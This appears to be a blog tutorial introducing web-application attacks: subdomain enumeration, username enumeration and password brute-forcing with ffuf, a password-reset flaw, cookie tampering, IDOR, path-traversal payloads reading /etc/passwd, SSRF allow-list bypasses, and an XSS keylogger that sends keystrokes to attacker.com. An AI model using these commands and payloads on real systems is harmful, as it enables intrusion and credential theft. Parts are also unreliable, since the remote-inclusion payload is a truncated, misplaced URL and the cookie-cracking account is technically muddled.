This article is the third and final installment in this series. It is only an introduction to the following topics: subdomain enumeration, authentication bypasses, IDOR vulnerabilities, file inclusion, SSRF, cross-site scripting and command injection. It's going to be a big one. So, strap on your belts and…

Let’s get started, shall we?...

Subdomain Enumeration

According to Wikipedia, in the Domain Name System (DNS) hierarchy, a subdomain is a domain that is a part of another (main) domain. For example, if a domain offered an online store as part of its website example.com, it might use the subdomain shop.example.com.

Why bother?

We do this to expand our attack surface and discover more potential points of vulnerability. Hypothetically, example.com has world-class security protocols in place. They claim their website is hackproof, which might be true for their main domain. But using subdomain enumeration, we come across several subdomains like test.example.com, api.example.com and many more, which may be less well protected. These give us entry points to launch our attacks.

Methodologies

1. Search Engines: Yes, search engines index trillions of links to more than a billion websites, which makes them an excellent resource for finding new subdomains. Using advanced search methods like Google dorking, we can find subdomains that were never intended to be accessed. Not just subdomains: we can also find classified files, private emails and private credentials using search engines.

2. SSL/TLS Certificates: Think of an SSL/TLS certificate as a driver's license of sorts: it serves two functions. It enables encrypted communication via Public Key Infrastructure, and it authenticates the identity of the certificate's holder. Publicly trusted certificates issued for a domain name are recorded in public Certificate Transparency logs, so that malicious or accidentally issued certificates can be spotted. We can query these logs through sites like crt.sh and transparencyreport.google.com/https/certifi... We can even use tools like DNSrecon to get this job done (explained a bit later).

3. Virtual Hosts: Virtual hosting allows more than one website to run on one system or web server. The sites are differentiated by their host name, and visitors are routed by host name or IP address to the correct virtual host. This lets companies sharing one server each have their own domain names. We can fuzz the Host header and monitor the responses we get to find new subdomains. As with DNS brute-forcing, we can automate this process with a wordlist of commonly used subdomains.
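To make the certificate method more concrete, here is a minimal Python sketch that pulls subdomains out of certificate search results. It assumes the results are a JSON list whose entries carry a `name_value` field with newline-separated host names, which is the shape crt.sh appears to return for its JSON output. The function name and the sample data are made up for illustration.

```python
import json


def subdomains_from_crtsh(json_text: str, domain: str) -> list[str]:
    """Extract unique names under `domain` from crt.sh-style JSON output."""
    found = set()
    for entry in json.loads(json_text):
        # One certificate can cover several names, separated by newlines.
        for name in entry.get("name_value", "").splitlines():
            name = name.strip().lower()
            # Drop a leading wildcard label such as "*.api.example.com".
            if name.startswith("*."):
                name = name[2:]
            # Keep only the domain itself and names below it.
            if name == domain or name.endswith("." + domain):
                found.add(name)
    return sorted(found)


# Hypothetical sample data, not real certificate records.
sample = json.dumps([
    {"name_value": "shop.example.com\nwww.example.com"},
    {"name_value": "*.api.example.com"},
    {"name_value": "example.com"},
    {"name_value": "unrelated.org"},
])
print(subdomains_from_crtsh(sample, "example.com"))
```

The same function could be fed the body of a saved certificate search instead of the sample string.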

OSINT Tools for accessing DNS records.

1. Automation using DNSrecon

dnsrecon -d example.com -t std --xml dnsrecon.xml

Scan a domain (-d example.com), do a standard scan (-t std), and save the output to a file (--xml dnsrecon.xml). Optionally, you can use a dictionary to brute force hostnames (-D /usr/share/wordlists/dnsmap.txt).

2. Automation Using Sublist3r

To speed up the process of OSINT subdomain discovery, we can automate the above methods with the help of tools like Sublist3r.

sublist3r -v -d example.com -t 5 -e bing -o ~/desktop/result.txt

Scan a domain (-d example.com), use 5 threads (-t 5), query only the Bing search engine (-e bing), and save the output to a file (-o ~/desktop/result.txt). Optionally, you can use verbose mode to print more information about the scan (-v).

3. Fuzzing virtual hosts Using ffuf

ffuf is short for "Fuzz Faster U Fool", and it's a CLI-based web fuzzing tool written in Go. Unlike traditional fuzzers, most web fuzzers rely on dictionaries (wordlists) rather than random or mutated inputs, although part of a dictionary may itself be generated by mutation. A good wordlist mostly reflects accumulated experience, which is what makes the fuzzing efficient. These techniques cover both broad multi-test fuzzing and fuzzing for one specific vulnerability.

ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.example.com" -u https://example.com

Attach a wordlist to the fuzzer (-w), set the Host header with FUZZ as the placeholder that is replaced by each word (-H "Host: FUZZ.example.com"), and give it a URL (-u). Optionally, you can filter the results by status code, line count, word count or size using -f[c|l|w|s].
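The idea behind the Host header fuzzing and the size filter can be sketched in a few lines of Python. This is only an illustration of the logic, not how ffuf is implemented: the helper names and the response sizes below are invented, and no requests are actually sent.

```python
def host_candidates(words: list[str], domain: str) -> list[str]:
    """Build one Host header value per wordlist entry."""
    return [f"{word}.{domain}" for word in words]


def interesting_hosts(sizes: dict[str, int], baseline_size: int) -> list[str]:
    """Keep hosts whose response size differs from the default response.

    Unknown virtual hosts usually fall back to the same default page,
    so a different size hints at a real virtual host.
    """
    return sorted(host for host, size in sizes.items() if size != baseline_size)


candidates = host_candidates(["www", "test", "api"], "example.com")

# Made-up response sizes, as if each candidate had been requested once.
observed = {
    "www.example.com": 2395,
    "test.example.com": 512,
    "api.example.com": 2395,
}
print(interesting_hosts(observed, baseline_size=2395))
```

Filtering on the baseline size plays the same role as ffuf's size filter: it hides every response that looks like the default page.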

Authentication Bypass

It's time to talk about bypassing user authentication. I'll talk about different ways website authentication methods can be bypassed, defeated or broken. These vulnerabilities can be some of the most critical, as they often end in leaks of customers' personal data.

Most websites out there use username and password combos to authenticate users. So, we need to guess correct combinations of username and password. Let's start with usernames.

Username Enumeration



So, how would you know if the username you entered in fact exists? The answer is website error messages. They are invaluable resources for collating this information and building our list of valid usernames. Take the signup page for creating a new user account (https://[Redacted]/customers/signup).

If you try entering the username admin and fill in the other form fields with fake information, you'll see we get the error "An account with this username already exists".



Automating username enumeration with ffuf

ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u https://[Redacted]/customers/signup -mr "username already exists"

In the above example, the -w argument selects the wordlist to be used in fuzzing. The -X argument specifies the request method; since it's a form, we use POST. The -d argument specifies the data that we are going to send. We've set the value of the username to FUZZ. The -H argument is used for adding additional headers to the request. In this instance, we're setting the Content-Type so the webserver knows we are sending form data. The -u argument specifies the URL we are making the request to, and finally, -mr is used to match a regular expression. In our case, it's the error message.
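The matching step is easy to picture in Python. The sketch below assumes we already have the response body for each tried username (the bodies here are invented) and keeps the names whose response contains the error message, which is roughly what a regex matcher does.

```python
import re

# The same pattern that was passed to -mr in the command above.
ALREADY_EXISTS = re.compile(r"username already exists")


def existing_usernames(responses: dict[str, str]) -> list[str]:
    """Return the usernames whose signup response contains the error message."""
    return sorted(
        username
        for username, body in responses.items()
        if ALREADY_EXISTS.search(body)
    )


# Hypothetical response bodies keyed by the username that was submitted.
responses = {
    "admin": "An account with this username already exists",
    "robert": "An account with this username already exists",
    "zzz-nobody": "Account created, please check your email",
}
print(existing_usernames(responses))
```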

Brute-forcing passwords with ffuf

Brute-forcing is a problem-solving approach that involves testing every single possible solution to a problem in order to find the right one. Note that online brute-force attacks against a live system are rarely viable because they are simply too slow: limited bandwidth, latency, throttling, perhaps CAPTCHAs, and so on. One could try a dictionary attack, but probably only with a very short list of passwords.

Brute-forcing works best for offline password attacks, where the attacker is in possession of the password hash and the only limiting factor is the hardware and software of their own system.

Regardless, let me show you how it works.

ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u https://[Redacted]/customers/login

It's similar to the previous command we wrote. We've chosen the keyword W1 for our list of valid usernames and W2 for the list of passwords. Both wordlists are again specified with the -w argument, separated by a comma, and every username is tried with every password.
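To see how two wordlists combine, here is a small Python sketch. It assumes the fuzzer pairs every entry of the first list with every entry of the second (as far as I know, this is ffuf's default "clusterbomb" mode). The function name and sample words are made up, and nothing is sent anywhere.

```python
from itertools import product
from urllib.parse import urlencode


def credential_bodies(usernames: list[str], passwords: list[str]):
    """Yield one form-encoded request body per username/password pair."""
    for username, password in product(usernames, passwords):
        yield urlencode({"username": username, "password": password})


users = ["admin", "robert"]
common_passwords = ["123456", "password", "qwerty"]

bodies = list(credential_bodies(users, common_passwords))
print(len(bodies))  # number of requests = len(users) * len(common_passwords)
print(bodies[0])
```

The request count grows as the product of the two list sizes, which is why online attacks only make sense with short lists.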

Taking Advantage of Poor Security Implementation

Every security protocol is only as effective as its developer. A lot of the time, we get to see logic flaws in an otherwise impenetrable system. There is no step-by-step way to exploit this kind of vulnerability. For this, you must develop a reverse-engineering mindset.

Let me give you an example. Suppose you've been tasked by the CIA with gaining access to a terrorist's account on gofundmyterror.com (completely hypothetical). Now, start thinking like the developers of gofundmyterror.com. They must have implemented some kind of password reset feature. On visiting the password reset page, you notice that they ask for a registered email as well as the username for that account. Now, think… What could go wrong?

Maybe those developers never checked that the email actually belongs to the username. To confirm your hypothesis, you write the following command

curl 'http://gofundmyterror.com/customers/reset' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=stupidkid&email=Your@email.com'

Since there is no email check, the password for stupidkid's account is sent to your email address. You have just exploited a poor security implementation.
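Seen from the developer's side, the missing piece is a single comparison. The following Python sketch shows the kind of check that would close this hole. The user store, the function name and the addresses are all hypothetical.

```python
from typing import Optional

# Hypothetical user store: username -> registered email address.
REGISTERED_EMAILS = {"stupidkid": "kid@example.com"}


def reset_recipient(username: str, submitted_email: str) -> Optional[str]:
    """Return the address a reset may be sent to, or None if the request is invalid.

    The reset only ever goes to the address on file, and only when the
    submitted email matches it.
    """
    registered = REGISTERED_EMAILS.get(username)
    if registered is None:
        return None  # unknown username
    if submitted_email.strip().lower() != registered.lower():
        return None  # email does not belong to this account
    return registered


print(reset_recipient("stupidkid", "Your@email.com"))   # attacker's address is rejected
print(reset_recipient("stupidkid", "kid@example.com"))  # owner's address is accepted
```

Returning the stored address rather than the submitted one means user input never decides where the email goes.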

Cookie Tampering

HTTP cookies are built specifically for web browsers to track, personalize, and save information about each user's session, including access control. Now, you must be thinking: why? Why have such critical information stored locally or, worse yet, transmitted across the internet with almost every request?

Because cookies take up little memory and tremendously help in reducing load on the server. Cookies can expire when the browser session ends (session cookies), or they can exist for a specified length of time on the client's computer (persistent cookies). This ensures a degree of security.

How does a cookie look?

I won't make age-old cookie puns. Cookies often look like gibberish. Even though they may contain sensitive data, what's the use if you can't tell what it means? This is often achieved by hashing. Cookie values can look like a long string of random characters; these are called hashes, which are an irreversible representation of the original text. Even though the hash is irreversible, the same input produces the same output every time. This is helpful for us, as services such as crackstation.net keep databases of billions of hashes and their original strings, often loosely called rainbow tables.
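Both properties, "same input, same output" and "reversible only by lookup", can be shown with Python's hashlib. This is a toy sketch: the three-word list stands in for the billions of entries a real lookup service holds, and the helper names are made up.

```python
import hashlib


def sha512_hex(text: str) -> str:
    """Return the SHA-512 digest of `text` as a hex string."""
    return hashlib.sha512(text.encode("utf-8")).hexdigest()


def build_lookup(candidates: list[str]) -> dict[str, str]:
    """Precompute hash -> original string for a list of guesses."""
    return {sha512_hex(word): word for word in candidates}


lookup = build_lookup(["admin", "password", "letmein"])

cookie_value = sha512_hex("admin")
# The hash is "reversed" only because the original was in our list.
print(lookup.get(cookie_value))
# A value that was never precomputed cannot be recovered this way.
print(lookup.get(sha512_hex("correct horse battery staple")))
```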

Let's assume we need to check a logged-in user's UniqueID (this is what the site uses to manage the user behind the scenes) and whether that user is the owner of the website. What we're looking for is:

Set-Cookie: session=a535d5495a671482c2316d8188086743; Max-Age=3600; Path=/

It doesn't look like much, but once it's cracked using rainbow tables and tools like John the Ripper, we see that it actually contains another hash: (673fe12475b073b37f1eebd13882d1c0b6c9dcbebd6ba8b9965d61c8abff0678acaa56f904a5537d58c354f3a55eaae593a16f31f3291a87f899317a57c4b3f9) This is in turn a SHA512 hash which, when cracked, gives us

{"id": 69, "Status": "Owner"}

This hash is used to confirm ownership of the website. So if you curl the website with this hash as the session cookie, you gain complete access to the website.

IDOR Vulnerability

Insecure direct object references (IDOR) are a type of access control vulnerability that arises when an application uses user-supplied input to directly access objects such as database records, files or other sensitive data.

Let's imagine an alternate universe. It's 1994 and Amazon has just launched. You create your account and notice the URL, amazon.com/?id=1024

At this point you should be curious enough to change the id parameter to a different value. So, curiosity gets the better of you and you change the value to 1. This gives you access to Amazon's admin account. Congratulations, you just found an IDOR vulnerability.
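In code, an IDOR usually comes down to a lookup that trusts the id from the URL. The Python sketch below contrasts that with a version that checks the id against the logged-in session. The account data, the Session class and both function names are invented for illustration.

```python
from dataclasses import dataclass


@dataclass
class Session:
    user_id: int
    is_admin: bool = False


# Hypothetical account table keyed by id.
ACCOUNTS = {
    1: {"name": "admin"},
    1024: {"name": "you"},
}


def get_account_insecure(requested_id: int):
    """Vulnerable: returns whatever id the URL asks for."""
    return ACCOUNTS.get(requested_id)


def get_account(session: Session, requested_id: int):
    """Only return the account if it belongs to the session (or the user is an admin)."""
    if requested_id != session.user_id and not session.is_admin:
        raise PermissionError("not allowed to view this account")
    return ACCOUNTS.get(requested_id)


me = Session(user_id=1024)
print(get_account_insecure(1))   # leaks the admin account
print(get_account(me, 1024))     # own account is fine
```

Calling `get_account(me, 1)` raises `PermissionError`, which is the behaviour the insecure version lacks.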

File Inclusion

So, what even is file inclusion?

If you have ever used a web application that loads a file based on a name or path you supplied, you have seen file inclusion at work. Features that let users upload or request images, videos and other files on a server are typical places where it shows up. The file name is no different from any other input parameter and should always be sanitized. There are two types of file inclusion seen out there, namely Local File Inclusion (LFI) and Remote File Inclusion (RFI).

Let's discuss a scenario where a user requests files from a webserver. First, the user sends an HTTP request to the webserver that names a file to display. For example, if a user wants to access and display their CV within the web application, the request may look as follows: https://example.com/user/profile?file=myCV.pdf, where file is the parameter and myCV.pdf is the file to access.

How would I exploit File Inclusion Vulnerability?

Let's consider our previous URL and try to understand what's happening here. There is a user model that has a profile, and this profile contains a file called myCV.pdf. The file parameter is used to read this PDF. Now, again, think: what could go wrong if we have more power than we should?



We might be able to read more than just a CV. Maybe we can even read files that compromise this web app's security. This method is known as path traversal and is a subset of file inclusion. We exploit it by adding payloads to the parameter and watching how the web application behaves. Path traversal attacks take advantage of moving up one directory at a time using the double dots ../. In this case the entry point is profile?file=. Websites hosted on Linux usually keep their documents under /var/www/. There might be further sub-directories, but everything resides within /var/www/.



If we somehow trace our way back up from this directory, we can read files that we shouldn't be able to read. Take /etc/passwd for instance: this file lists the usernames of all the accounts on the server.
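How the ../ sequences climb out of the web directory can be checked with Python's posixpath module. The base directory below is an assumption (the article only tells us everything lives under /var/www/), and the containment check is a simplified sketch that does not account for symlinks.

```python
import posixpath

# Hypothetical directory the application is supposed to read from.
BASE_DIR = "/var/www/app/profiles"


def resolve(user_file: str) -> str:
    """Join the user-supplied name onto the base directory and collapse any ../ parts."""
    return posixpath.normpath(posixpath.join(BASE_DIR, user_file))


def is_inside_base(user_file: str) -> bool:
    """True only if the resolved path is still below BASE_DIR."""
    return resolve(user_file).startswith(BASE_DIR + "/")


print(resolve("myCV.pdf"))                 # stays inside the profiles directory
print(resolve("../../../../etc/passwd"))   # climbs up to /etc/passwd
print(is_inside_base("../../../../etc/passwd"))
```

Four ../ steps are enough here because the assumed base directory is four levels deep. Extra ../ steps beyond the root are simply ignored.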

There you have it. Just as simple as that. You just learnt how to perform local file inclusion.

LFI attacks against web apps often work because developers lack security awareness. In PHP, passing user input to functions such as include() and require() often contributes to this vulnerability.

<?php

// Vulnerable: the file name comes straight from the URL with no validation

include($_GET["file"]);

?>

If you're unfamiliar with PHP, let me explain what this code means. $_GET is a superglobal variable that collects data sent in the URL query string, such as form data submitted with the GET method. When loading the file, PHP first looks for the supplied file in the directories listed in include_path.

Let's walk through a case where developers try to sanitize the input. Take our previous example and tweak the URL a bit: example.com/user/profile?file=myCV. Note that we no longer have to supply the file extension. We don't know the implementation behind it, but one guess is that the developers are appending the required extension to our input behind the scenes. If we try the same payload as before, we might get some sort of path or file not found error. For example, if we use /etc/passwd, the web application appends the extension ".pdf" to "passwd", so our payload is interpreted as passwd.pdf, which won't be found.

To bypass this, we put a null byte (%00) at the end of our payload. Think of it as tricking the web app into disregarding whatever comes after the null byte. (Patched in PHP 5.3.4)

Other times developers may try to filter keywords out of our payload. For example, someone might strip ../ from our previous payload ../../../../etc/passwd, rendering it useless. To bypass this, we modify the payload so that it is back to its original form after filtering. One might use ....//....//....//....//etc/passwd: the filter only matches and removes each ../ it finds in a single pass and doesn't do another pass over the result, leaving us with our original payload.
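The single-pass behaviour is easy to reproduce. Python's str.replace works through the string once, left to right, much like the filter described above, so the sketch below uses it as a stand-in for the PHP filter. Both function names are made up.

```python
def naive_filter(payload: str) -> str:
    """Remove every ../ found in one left-to-right pass (no second pass)."""
    return payload.replace("../", "")


def repeated_filter(payload: str) -> str:
    """Keep filtering until a pass no longer changes anything."""
    previous = None
    while previous != payload:
        previous = payload
        payload = payload.replace("../", "")
    return payload


doubled = "....//....//....//....//etc/passwd"

# Each "....//" loses the "../" in its middle and collapses to "../".
print(naive_filter(doubled))
# Repeating the pass until nothing changes removes the traversal entirely.
print(repeated_filter(doubled))
```

Even the repeated version is only a sketch of the idea. Resolving the final path and checking that it is still inside the allowed directory is generally more reliable than stripping substrings.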

Remote File Inclusion

Just like LFI, RFI occurs when too much trust is placed in user input. One requirement for RFI is that the allow_url_fopen option is on (in current PHP versions, allow_url_include has to be enabled as well). In a real-world scenario, it's very unlikely that the server already contains files or programs that would grant you RCE. That's why the risk of RFI is higher than that of LFI: RFI lets an attacker bring their own code and gain Remote Command Execution on the server.

For a successful RFI attack, the application server must be able to reach an external server where the attacker hosts malicious files. The URL of the malicious file is then injected into the include function. The payload looks something like this

api.example.com/seller/100348?changeAccount..

Server Side Request Forgery

SSRF stands for Server-Side Request Forgery. It's a vulnerability that lets an attacker cause the server to make additional HTTP requests to a resource of the attacker's choosing, such as a compromised or malicious server.

Potential SSRF vulnerabilities can be spotted in web applications in fields or parameters that take a URL as input. These can be hidden fields within an HTML document or even URL parameters.

api.example.com/seller/100348?changeAccount..

At first glance, this looks like it could be vulnerable. Maybe we can change the value for the store? When you change the value, you see "waiting for store.example.com". These messages are usually displayed at the bottom left of your browser window.

This tells us that the changeAccount parameter does indeed resolve to a URL. If you run a Python server on your own machine and set it to listen for incoming connections, you might be able to make api.example.com send its HTTP requests to you instead of the intended website. For instance,

seller?changeAccount=http://[your IP]:[your Port]

This might reveal sensitive information like API keys which can further be used to completely hijack the account.
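A listening server like the one mentioned above can be put together with Python's standard library. This is a minimal sketch that records the path and headers of every GET request it receives. The names `captured`, `LoggingHandler` and `start_listener` are made up, and it binds to 127.0.0.1 here, so you would have to bind to an externally reachable address for a remote server to reach it.

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Every request is stored here as (path, headers) so it can be inspected later.
captured = []


class LoggingHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Record what the remote side sent, including any keys in the headers.
        captured.append((self.path, dict(self.headers)))
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"ok")

    def log_message(self, format, *args):
        pass  # keep the console quiet; everything is in `captured`


def start_listener(port: int = 0) -> HTTPServer:
    """Start the listener in a background thread; port 0 picks a free port."""
    server = HTTPServer(("127.0.0.1", port), LoggingHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

Calling `server = start_listener(8000)` starts it in the background, `captured` fills up as requests arrive, and `server.shutdown()` stops it again.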

Some developers are aware of the risks that SSRF vulnerabilities pose and may implement checks in their applications to make sure the requested resource meets specific rules. There are usually two approaches to this: either a blacklist or a whitelist.

Black List: A Web Application may employ this list to protect sensitive endpoints, IP addresses or domains from being accessed by the public while still allowing access to other locations.

Also, in a cloud environment, it would be beneficial to block access to the IP address 169.254.169.254, which contains metadata for the deployed cloud server, including possibly sensitive information.

White List: A list where all requests get denied unless they appear on the list or match a particular pattern, such as a rule that a URL used in a parameter must begin with example.com. An attacker could quickly circumvent this rule by creating a subdomain on their own domain name, such as example.com.attackers-domain.com
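Both kinds of check can be sketched with Python's urllib.parse and ipaddress modules. The function names are invented and the rules are simplified assumptions: a real deny check would also have to resolve host names and follow redirects, which this sketch does not do.

```python
import ipaddress
from urllib.parse import urlparse

ALLOWED_DOMAIN = "example.com"


def naive_allow(url: str) -> bool:
    """The weak rule from the text: the URL merely has to begin with example.com."""
    return url.startswith(("http://example.com", "https://example.com"))


def strict_allow(url: str) -> bool:
    """Compare the parsed host name instead of the raw string prefix."""
    host = urlparse(url).hostname or ""
    return host == ALLOWED_DOMAIN or host.endswith("." + ALLOWED_DOMAIN)


def is_denied_ip(host: str) -> bool:
    """Deny loopback, private and link-local addresses such as 169.254.169.254."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # not an IP literal; host names are not resolved here
    return ip.is_link_local or ip.is_loopback or ip.is_private


bypass = "https://example.com.attackers-domain.com/"
print(naive_allow(bypass))    # the prefix rule is fooled
print(strict_allow(bypass))   # the host comparison is not
print(is_denied_ip("169.254.169.254"))
```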

Cross Site Scripting

Cross-Site Scripting is an injection attack where malicious JavaScript gets injected into a web application with the intention of being executed by other clients that connect to the server.
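The injection happens when user input is placed into a page as-is. The Python sketch below shows the difference between dropping a comment straight into HTML and escaping it first with the standard html module. The two render functions are hypothetical stand-ins for whatever templating a real application uses.

```python
import html


def render_comment_unsafe(comment: str) -> str:
    """Vulnerable: the comment becomes part of the page's markup."""
    return f"<p>{comment}</p>"


def render_comment(comment: str) -> str:
    """Escape <, >, & and quotes so the browser shows the text instead of running it."""
    return f"<p>{html.escape(comment)}</p>"


payload = "<script>alert(1)</script>"
print(render_comment_unsafe(payload))  # the script tag survives intact
print(render_comment(payload))         # the tag is rendered as harmless text
```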

Exposure of XSS

Session Stealing: Details of a user's session, such as login tokens, are often kept in cookies on the target's machine. These can be stolen using XSS, since the code executes on the client's PC.

Key Logger: The code below acts as a key logger. It logs everything that you type in the page, including login credentials, UIDs and even bank details.

<script>document.onkeypress = function(ex) { fetch('https://attacker.com/log?key=' + btoa(ex.key) );}</script>

and many more..

Kindly comment below for more...